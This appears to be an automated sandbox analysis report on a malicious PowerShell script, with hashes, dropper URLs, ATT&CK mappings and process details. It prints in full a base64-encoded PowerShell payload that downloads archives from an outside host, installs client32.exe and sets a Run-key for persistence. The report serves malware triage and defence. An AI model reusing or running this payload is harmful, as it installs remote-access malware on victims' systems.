14aa22db356f6a5328c08fb4c3c59bfebfb07b1de54dc41a6a8b71c01cbdd999

General

Target

b64_akam_kent_2708.ps1
Size

7KB
MD5

c425e23bb0e53f62eddc405abd38ea56
SHA1

96726a404abbe9a00561173544fd13d2ada3e07a
SHA256

14aa22db356f6a5328c08fb4c3c59bfebfb07b1de54dc41a6a8b71c01cbdd999
SHA512

3dc6b50af2bc5284f44b366d2427931fc219b71243b3a36f39fa8537560873fd7ed734b2654b8593b7a8bea673dc42303042e84cd1f55df129859bdebe8961a3
SSDEEP

192:auL4HV/9SoNWHX5EV7rHSdeR+N3JbsSU7Fcn2G:2HV/9S1HA7rqeR+NJsP5DG

Score

10^/10

execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://calbyiris.com/fvz/f2v.zip

exe.dropper

https://calbyiris.com/fvz/f1v.zip

exe.dropper

https://calbyiris.com/fvz/f3v.zip

exe.dropper

https://calbyiris.com/fvz/f4v.zip

exe.dropper

https://calbyiris.com/fvf/

Signatures

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HDiskDefragm = "C:\\Users\\Admin\\AppData\\Roaming\\HDiskDefragm\\client32.exe"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2676	powershell.exe
1348	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1348	powershell.exe
1348	powershell.exe
2676	powershell.exe
2676	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1348 wrote to memory of 2676	1348	powershell.exe	83
PID 1348 wrote to memory of 2676	1348	powershell.exe	83

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b64_akam_kent_2708.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOPRofIlE -exEcUTiONpOlI bypASS -WinDOWST HiD -ec JAA3AGMAcQBNAFEAYgA9ACcAaAB0AHQAcABzADoALwAvAGMAYQBsAGIAeQBpAHIAaQBzAC4AYwBvAG0ALwBmAHYAegAvAGYAMgB2AC4AegBpAHAAJwA7ACAAJABZAEcAUwBKAHkAPQAnADgATABmAHoAdQAuAHoAaQBwACcAOwAgAGMASABkAGkAcgAgACQAZQBuAFYAOgBhAFAAUABEAGEAdABhADsAIAAkAGEAUwBPAGkAQwBOAEcAPQAnAEgARABpAHMAawBEAGUAZgByAGEAZwBtACcAOwAgACQATwBjAHQAVABKAE4ATAA9ACcATAAxAFAANQBrAEcALgB6AGkAcAAnADsAIAAkAGkAcwBVAGwAYQA9ACcAaAB0AHQAcABzADoALwAvAGMAYQBsAGIAeQBpAHIAaQBzAC4AYwBvAG0ALwBmAHYAegAvAGYAMQB2AC4AegBpAHAAJwA7ACAAWwBOAEUAVAAuAHMARQByAHYAaQBjAGUAUABPAEkAbgB0AE0AYQBOAGEAZwBFAFIAXQA6ADoAUwBlAEMAdQByAEkAVABZAHAAUgBvAHQAbwBjAG8ATAAgAD0AIABbAE4ARQB0AC4AcwBFAEMAVQBSAGkAVAB5AHAAcgBPAHQAbwBjAE8AbABUAHkAUABlAF0AOgA6AHQATABTADEAMgA7ACAAJABVAHIAMgA0AGwAWABYAD0AZwBjAE0AIABTAFQAYQBSAHQALQBiAGkAdABzAHQAUgBBAE4AcwBGAGUAUgAgAC0ARQBSAFIAbwBSAGEAYwBUAEkAbwBOACAAUwBJAGwARQBOAFQATAB5AGMATwBOAFQAaQBOAFUAZQA7ACAAJABwADcAbQA3AHIAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbABiAHkAaQByAGkAcwAuAGMAbwBtAC8AZgB2AHoALwBmADMAdgAuAHoAaQBwACcAOwAgACQARQBqAHQAYQBPAD0AZwBjAE0AIABFAHgAcABhAG4ARAAtAEEAUgBDAEgASQB2AEUAIAAtAEUAcgBSAG8AcgBBAEMAVABJAG8AbgAgAFMASQBMAEUAbgBUAEwAeQBjAE8AbgBUAGkAbgB1AGUAOwAgACQASgA0ADUASwBwAFIAdwByAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBhAGwAYgB5AGkAcgBpAHMALgBjAG8AbQAvAGYAdgB6AC8AZgA0AHYALgB6AGkAcAAnADsAIAAkAGYAdQBSAFQANABHAFEAWgA9ACcAQwBlAG4AdwBnAC4AegBpAHAAJwA7ACAAJAB6AG4AOABpAEIAVQBHAD0AJwA5ADkANABVAHgALgB6AGkAcAAnADsAIAAkAGgARAB0AGEATQAyAFYAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBOAFYAOgBBAFAAcABEAGEAVABhACwAIAAkAGYAdQBSAFQANABHAFEAWgA7ACAAJABIAHMAaQBpAFIASwBWAD0ASgBvAGkAbgAtAHAAQQB0AGgAIAAtAHAAQQBUAGgAIAAkAEUATgBWADoAQQBQAHAARABhAFQAYQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkAFkARwBTAEoAeQA7ACAAJAA5ADcARABCADgAYwA9ACQARQBuAFYAOgBBAFAAUABEAGEAdABhACwAIAAkAE8AYwB0AFQASgBOAEwAIAAtAEoATwBJAE4AIAAnAFwAJwA7ACAAJAB6ADUAVgBkAFgAPQAkAGUATgBWADoAQQBQAFAAZABBAHQAYQArACcAXAAnACsAJAB6AG4AOABpAEIAVQBHADsAIAAkAEUAVQAzAGoAYwA9ACcAQgBpAFQAcwBhAEQATQBpAE4ALgBlAFgAZQAgAC8AdABSAEEAbgBzAGYARQByACAAUwBEAE4AWgBnADUAIAAvAGQAbwB3AE4AbABPAEEARAAgAC8AUABSAGkAbwByAEkAVAB5ACAAbgBPAFIAbQBBAGwAJwAsACAAJABpAHMAVQBsAGEALAAgACQAaABEAHQAYQBNADIAVgAgAC0AagBvAEkATgAgACcAIAAnADsAIAAkAFIAdAAzAFUATQBSADQAPQAnAEIAaQBUAHMAYQBEAE0AaQBOAC4AZQBYAGUAIAAvAHQAUgBBAG4AcwBmAEUAcgAgAFMARABOAFoAZwA1ACAALwBkAG8AdwBOAGwATwBBAEQAIAAvAFAAUgBpAG8AcgBJAFQAeQAgAG4ATwBSAG0AQQBsACAAJwArACQASgA0ADUASwBwAFIAdwByACsAJwAgACcAKwAkAEgAcwBpAGkAUgBLAFYAOwAgACQAQwBVAEMAawBoAD0AIgBCAGkAdABTAGEARABtAEkATgAuAGUAWABFACAALwB0AFIAQQBOAFMAZgBlAFIAIABGAEsATQB0AFQARQAgAC8AZABvAHcAbgBMAE8AQQBEACAALwBwAFIASQBvAFIAaQBUAHkAIABOAE8AcgBNAGEATAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQANwBjAHEATQBRAGIALAAgACQAOQA3AEQAQgA4AGMAOwAgACQAdAA3AGcAZQBZAEIAbQA9ACIAJABFAG4AdgA6AGEAUABwAEQAYQBUAEEAXAAkAGEAUwBPAGkAQwBOAEcAIgA7ACAAJABxAEMANwBHAEMAPQAnAEIAaQBUAHMAYQBEAG0AaQBOAC4AZQB4AGUAIAAvAHQAUgBBAG4AUwBGAGUAcgAgAGsAbwA5AGwAQgAgAC8AZABvAHcAbgBMAE8AQQBkACAALwBwAFIASQBPAFIASQBUAFkAIABOAG8AUgBNAGEAbAAnACwAIAAkAHAANwBtADcAcgAsACAAJAB6ADUAVgBkAFgAIAAtAEoATwBpAG4AIAAnACAAJwA7ACAAaQBGACAAKAAkAEUAagB0AGEATwApACAAewAgAGkARgAgACgAJABVAHIAMgA0AGwAWABYACkAIAB7ACAAcwB0AGEAUgBUAC0AQgBJAHQAUwBUAFIAYQBOAHMARgBFAFIAIAAtAHMATwBVAFIAQwBFACAAJABwADcAbQA3AHIAIAAtAEQARQBzAHQAaQBOAGEAdABJAE8AbgAgACQAegA1AFYAZABYADsAIABzAHQAQQBSAHQALQBiAEkAdABTAFQAcgBBAE4AcwBGAEUAcgAgAC0AcwBPAFUAUgBDAEUAIAAkAEoANAA1AEsAcABSAHcAcgAgAC0AZABFAHMAdABJAG4AYQBUAGkATwBuACAAJABIAHMAaQBpAFIASwBWADsAIABzAFQAYQBSAFQALQBiAEkAVABTAHQAcgBBAE4AUwBGAEUAUgAgAC0AUwBvAFUAcgBjAGUAIAAkADcAYwBxAE0AUQBiACAALQBkAEUAcwBUAEkAbgBBAFQASQBvAE4AIAAkADkANwBEAEIAOABjADsAIABTAFQAYQBSAFQALQBiAEkAVABzAFQAcgBBAG4AcwBmAEUAUgAgAC0AUwBPAHUAcgBDAEUAIAAkAGkAcwBVAGwAYQAgAC0ARABFAHMAdABJAG4AYQB0AGkAbwBuACAAJABoAEQAdABhAE0AMgBWADsAIAB9ACAAZQBMAHMAZQAgAHsAaQBOAHYATwBrAEUALQBlAHgAUAByAEUAUwBzAGkATwBuACAALQBDAG8ATQBtAGEAbgBEACAAJABSAHQAMwBVAE0AUgA0ADsAIABpAE4AdgBPAGsARQAtAGUAeABQAHIARQBTAHMAaQBPAG4AIAAtAEMAbwBNAG0AYQBuAEQAIAAkAEMAVQBDAGsAaAA7ACAAaQBlAHgAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAHEAQwA3AEcAQwA7ACAAaQBlAHgAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAEUAVQAzAGoAYwA7ACAAfQAgAEUAeABQAEEATgBkAC0AYQBSAEMASABpAFYARQAgAC0AUABhAFQAaAAgACQASABzAGkAaQBSAEsAVgAgAC0ARABFAFMAdABpAG4AYQBUAGkATwBOAHAAYQB0AEgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAGUAeABwAGEATgBkAC0AQQBSAGMASABJAHYAZQAgAC0AUABhAFQASAAgACQAOQA3AEQAQgA4AGMAIAAtAEQARQBTAFQAaQBuAEEAVABpAG8AbgBwAGEAdABIACAAJAB0ADcAZwBlAFkAQgBtADsAIABFAFgAcABhAE4AZAAtAEEAUgBjAGgAaQB2AGUAIAAtAHAAYQBUAEgAIAAkAHoANQBWAGQAWAAgAC0AZABlAHMAdABJAG4AYQB0AEkAbwBOAHAAYQB0AGgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAGUAWABQAEEATgBEAC0AYQBSAGMAaABJAHYAZQAgAC0AUABBAHQAaAAgACQAaABEAHQAYQBNADIAVgAgAC0AZABlAFMAVABpAG4AQQB0AGkAbwBOAFAAYQBUAEgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAHIARQBtAG8AVgBlAC0AaQB0AGUATQAgAC0AUABBAFQASAAgACQAegA1AFYAZABYADsAIABEAGUAbAAgAC0AcABhAFQAaAAgACQASABzAGkAaQBSAEsAVgA7ACAAcgBEACAALQBQAGEAVABIACAAJABoAEQAdABhAE0AMgBWADsAIABFAHIAQQBTAEUAIAAtAFAAYQB0AGgAIAAkADkANwBEAEIAOABjADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAFkAcwBtAFEASgA5AD0AJwBoAHQAdABwAHMAOgAvAC8AYwBhAGwAYgB5AGkAcgBpAHMALgBjAG8AbQAvAGYAdgBmAC8AJwA7ACAATgBpACAALQBQAGEAVABIACAAJABFAE4AVgA6AGEAcABwAEQAQQB0AEEAIAAtAE4AQQBtAGUAIAAkAGEAUwBPAGkAQwBOAEcAIAAtAEkAdABlAE0AVABZAHAARQAgACcAZABpAHIAZQBjAHQAbwByAHkAJwA7ACAAJAA0AG8ARwAzAFIATgA9AEAAKAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBUAEMAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBQAEMASQBDAEwAMwAyAC4ARABMAEwAJwAsACAAJwByAGUAbQBjAG0AZABzAHQAdQBiAC4AZQB4AGUAJwAsACAAJwBOAFMATQAuAEwASQBDACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAbgBzAG0AXwB2AHAAcgBvAC4AaQBuAGkAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcASABUAEMAVABMADMAMgAuAEQATABMACcALAAgACcAbgBzAGsAYgBmAGwAdAByAC4AaQBuAGYAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnACkAOwAgAGkARgAgACgAJABVAHIAMgA0AGwAWABYACkAIAB7ACAAJAA0AG8ARwAzAFIATgAgAHwAIABGAE8AUgBlAEEAYwBIACAAewAgACQAZwBGAFQANABDAGQARAA9ACQAWQBzAG0AUQBKADkAKwAkAF8AOwAgACQAcQBtAEUAcwBxAD0AIgB7ADAAfQBcAHsAMQB9ACIAIAAtAGYAIAAkAHQANwBnAGUAWQBCAG0ALAAgACQAXwA7ACAAcwBUAEEAUgB0AC0AQgBJAFQAUwB0AFIAYQBuAFMARgBFAFIAIAAtAFMATwB1AFIAQwBlACAAJABnAEYAVAA0AEMAZABEACAALQBEAGUAUwBUAEkAbgBBAFQAaQBvAE4AIAAkAHEAbQBFAHMAcQA7ACAAfQA7AH0AIABFAEwAUwBFACAAewAgACQANABvAEcAMwBSAE4AIAB8ACAAJQAgAHsAIAAkAGcARgBUADQAQwBkAEQAPQAkAFkAcwBtAFEASgA5ACsAJABfADsAIAAkAHEAbQBFAHMAcQA9ACIAJAB0ADcAZwBlAFkAQgBtAFwAJABfACIAOwAgACQAWQBuAFMASwBZAD0AJwBCAGkAdABzAEEAZABtAGkAbgAuAGUAWABFACAALwBUAHIAQQBOAFMAZgBlAFIAIABzAGwAeQBFAEUARABRAFMAIAAvAGQAbwB3AG4ATABPAGEAZAAgAC8AUAByAGkATwBSAGkAVABZACAATgBvAFIATQBhAGwAIAAnACsAJABnAEYAVAA0AEMAZABEACsAJwAgACcAKwAkAHEAbQBFAHMAcQA7ACAAJgAgACQAWQBuAFMASwBZADsAfQA7ACAAfQA7ACAAfQA7ACAAJABXAHMAMABQAHUASAB4AHEAPQBnAEkAIAAkAHQANwBnAGUAWQBCAG0AIAAtAGYAbwBSAGMARQA7ACAAJABXAHMAMABQAHUASAB4AHEALgBBAHQAdAByAEkAYgB1AHQAZQBzAD0AJwBIAGkAZABkAGUAbgAnADsAIAAkAHEAVQBzAEUAeQA9ACIAJAB0ADcAZwBlAFkAQgBtAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAIgA7ACAAQwBkACAAJAB0ADcAZwBlAFkAQgBtADsAIABuAGUAVwAtAGkAdABlAG0AcAByAG8AUABFAHIAdAB5ACAALQBQAEEAVABIACAAJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAEEAbQBlACAAJABhAFMATwBpAEMATgBHACAALQB2AGEATABVAEUAIAAkAHEAVQBzAEUAeQAgAC0AcABSAG8AcABFAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwAgAHMAdABBAFIAVAAtAFAAUgBvAEMARQBTAHMAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7AA==
  2⤵
  - Adds Run key to start application
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
e5ab5d093e49058a43f45f317b401e68

SHA1
120da069a87aa9507d2b66c07e368753d3061c2d

SHA256
4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74

SHA512
d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5xllqctp.n52.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1348-28-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/1348-10-0x000001BAE29A0000-0x000001BAE29C2000-memory.dmp

Filesize
136KB

Download
memory/1348-11-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/1348-12-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/1348-46-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/1348-45-0x000001BAE2680000-0x000001BAE289C000-memory.dmp

Filesize
2.1MB

Download
memory/1348-31-0x000001BAE2680000-0x000001BAE289C000-memory.dmp

Filesize
2.1MB

Download
memory/1348-0-0x00007FF9B8FE3000-0x00007FF9B8FE5000-memory.dmp

Filesize
8KB

Download
memory/2676-29-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2676-35-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2676-30-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2676-32-0x000001BEC8230000-0x000001BEC844C000-memory.dmp

Filesize
2.1MB

Download
memory/2676-26-0x000001BEC8850000-0x000001BEC8864000-memory.dmp

Filesize
80KB

Download
memory/2676-33-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2676-34-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2676-27-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2676-36-0x000001BEC8A20000-0x000001BEC8A32000-memory.dmp

Filesize
72KB

Download
memory/2676-37-0x000001BEC8A40000-0x000001BEC8A4A000-memory.dmp

Filesize
40KB

Download
memory/2676-40-0x000001BEC8230000-0x000001BEC844C000-memory.dmp

Filesize
2.1MB

Download
memory/2676-41-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2676-24-0x000001BEC87B0000-0x000001BEC87D6000-memory.dmp

Filesize
152KB

Download
memory/2676-25-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2676-23-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2676-13-0x00007FF9B8FE0000-0x00007FF9B9AA1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads